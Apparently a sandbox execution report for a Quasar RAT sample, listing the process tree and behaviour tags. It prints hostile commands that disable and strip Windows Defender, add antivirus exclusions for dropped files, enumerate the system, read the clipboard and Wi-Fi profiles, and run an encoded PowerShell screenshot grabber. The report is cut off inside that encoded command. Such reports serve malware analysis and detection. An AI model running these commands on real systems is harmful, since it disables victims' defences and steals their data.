C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"3⤵
- Suspicious use of WriteProcessMemory
PID:2864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend4⤵
- Quasar RAT
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1092
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'"3⤵
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\bound.exe'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3076
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "start bound.exe"3⤵
- Suspicious use of WriteProcessMemory
PID:4168 -
C:\Users\Admin\AppData\Local\Temp\bound.exebound.exe4⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4864 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\CSgOoufRRvSm.bat" "5⤵
- System Location Discovery: System Language Discovery
PID:2944 -
C:\Windows\SysWOW64\chcp.comchcp 650016⤵
- System Location Discovery: System Language Discovery
PID:4488
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost6⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:996
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"6⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4616 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UZDKdmEDsM3Y.bat" "7⤵
- System Location Discovery: System Language Discovery
PID:2080 -
C:\Windows\SysWOW64\chcp.comchcp 650018⤵
- System Location Discovery: System Language Discovery
PID:4772
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost8⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4028
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"8⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2376 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZoKq6BqKqRuE.bat" "9⤵
- System Location Discovery: System Language Discovery
PID:1864 -
C:\Windows\SysWOW64\chcp.comchcp 6500110⤵
- System Location Discovery: System Language Discovery
PID:4432
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost10⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3260
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"10⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4612 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\d4SLaZSQnWlv.bat" "11⤵
- System Location Discovery: System Language Discovery
PID:5108 -
C:\Windows\SysWOW64\chcp.comchcp 6500112⤵
- System Location Discovery: System Language Discovery
PID:872
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost12⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3420
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"12⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:3456 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\iJZr3y4Xkacb.bat" "13⤵
- System Location Discovery: System Language Discovery
PID:2104 -
C:\Windows\SysWOW64\chcp.comchcp 6500114⤵
- System Location Discovery: System Language Discovery
PID:3340
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost14⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4004
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"14⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4048 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7C8HrAVuGfaC.bat" "15⤵
- System Location Discovery: System Language Discovery
PID:1808 -
C:\Windows\SysWOW64\chcp.comchcp 6500116⤵
- System Location Discovery: System Language Discovery
PID:2796
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost16⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4824
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"16⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4036 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\MarBQ6B0xGFk.bat" "17⤵
- System Location Discovery: System Language Discovery
PID:4856 -
C:\Windows\SysWOW64\chcp.comchcp 6500118⤵
- System Location Discovery: System Language Discovery
PID:4344
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost18⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:1496
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"18⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1108 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\mXA67Ux9tEtv.bat" "19⤵
- System Location Discovery: System Language Discovery
PID:3364 -
C:\Windows\SysWOW64\chcp.comchcp 6500120⤵
- System Location Discovery: System Language Discovery
PID:872
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost20⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2772
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"20⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1520 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\8Ovn9vECtVAc.bat" "21⤵
- System Location Discovery: System Language Discovery
PID:3156 -
C:\Windows\SysWOW64\chcp.comchcp 6500122⤵
- System Location Discovery: System Language Discovery
PID:4468
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost22⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3532
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"22⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2172 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zbISih8CuF9l.bat" "23⤵
- System Location Discovery: System Language Discovery
PID:5008 -
C:\Windows\SysWOW64\chcp.comchcp 6500124⤵
- System Location Discovery: System Language Discovery
PID:4752
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost24⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3500
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"24⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:1648 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\V3Zwy1gj3zNk.bat" "25⤵
- System Location Discovery: System Language Discovery
PID:4864 -
C:\Windows\SysWOW64\chcp.comchcp 6500126⤵
- System Location Discovery: System Language Discovery
PID:848
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost26⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:3888
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"26⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:4420 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\dKVBEAS9WrvL.bat" "27⤵
- System Location Discovery: System Language Discovery
PID:3892 -
C:\Windows\SysWOW64\chcp.comchcp 6500128⤵
- System Location Discovery: System Language Discovery
PID:4884
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost28⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2092
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"28⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:2976 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\qeTauvnVnZvJ.bat" "29⤵
- System Location Discovery: System Language Discovery
PID:4524 -
C:\Windows\SysWOW64\chcp.comchcp 6500130⤵
- System Location Discovery: System Language Discovery
PID:636
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost30⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:4504
-
-
C:\Users\Admin\AppData\Local\Temp\bound.exe"C:\Users\Admin\AppData\Local\Temp\bound.exe"30⤵
- Checks computer location settings
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of SetWindowsHookEx
PID:404 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZHAB2XaLCde5.bat" "31⤵
- System Location Discovery: System Language Discovery
PID:2960 -
C:\Windows\SysWOW64\chcp.comchcp 6500132⤵
- System Location Discovery: System Language Discovery
PID:5060
-
-
C:\Windows\SysWOW64\PING.EXEping -n 10 localhost32⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:2452
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 404 -s 224831⤵
- Program crash
PID:1644
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2976 -s 224029⤵
- Program crash
PID:1632
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4420 -s 220827⤵
- Program crash
PID:1544
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1648 -s 220825⤵
- Program crash
PID:4080
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2172 -s 220823⤵
- Program crash
PID:4272
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1520 -s 166021⤵
- Program crash
PID:3984
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1108 -s 224019⤵
- Program crash
PID:2976
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4036 -s 194017⤵
- Program crash
PID:3016
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4048 -s 223215⤵
- Program crash
PID:3596
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3456 -s 220813⤵
- Program crash
PID:3268
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4612 -s 168411⤵
- Program crash
PID:4228
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 22409⤵
- Program crash
PID:3780
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4616 -s 22287⤵
- Program crash
PID:3932
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4864 -s 22245⤵
- Program crash
PID:2288
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵
- Suspicious use of WriteProcessMemory
PID:3116 -
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"3⤵
- Suspicious use of WriteProcessMemory
PID:4604 -
C:\Windows\System32\Wbem\WMIC.exewmic csproduct get uuid4⤵
- Suspicious use of AdjustPrivilegeToken
PID:3568
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"3⤵
- Suspicious use of WriteProcessMemory
PID:1088 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 24⤵PID:2464
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"3⤵
- Suspicious use of WriteProcessMemory
PID:2064 -
C:\Windows\system32\reg.exeREG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 24⤵PID:1596
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2772 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
- Suspicious use of AdjustPrivilegeToken
PID:4344
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"3⤵
- Suspicious use of WriteProcessMemory
PID:2244 -
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name4⤵
- Detects videocard installed
PID:3728
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'"3⤵
- Suspicious use of WriteProcessMemory
PID:436 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\ .scr'4⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2416
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:1780
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2396
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:2588
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:3436
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"3⤵PID:2920
-
C:\Windows\System32\Wbem\WMIC.exeWMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName4⤵PID:2056
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"3⤵
- Clipboard Data
PID:1340 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Get-Clipboard4⤵
- Clipboard Data
- Suspicious behavior: EnumeratesProcesses
PID:4980
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tasklist /FO LIST"3⤵PID:4432
-
C:\Windows\system32\tasklist.exetasklist /FO LIST4⤵
- Enumerates processes with tasklist
PID:2360
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "systeminfo"3⤵PID:4244
-
C:\Windows\system32\systeminfo.exesysteminfo4⤵
- Gathers system information
PID:2080
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "tree /A /F"3⤵PID:2984
-
C:\Windows\system32\tree.comtree /A /F4⤵PID:412
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "netsh wlan show profile"3⤵
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2788 -
C:\Windows\system32\netsh.exenetsh wlan show profile4⤵
- Event Triggered Execution: Netsh Helper DLL
- System Network Configuration Discovery: Wi-Fi Discovery
PID:2864
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="3⤵PID:4708
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwB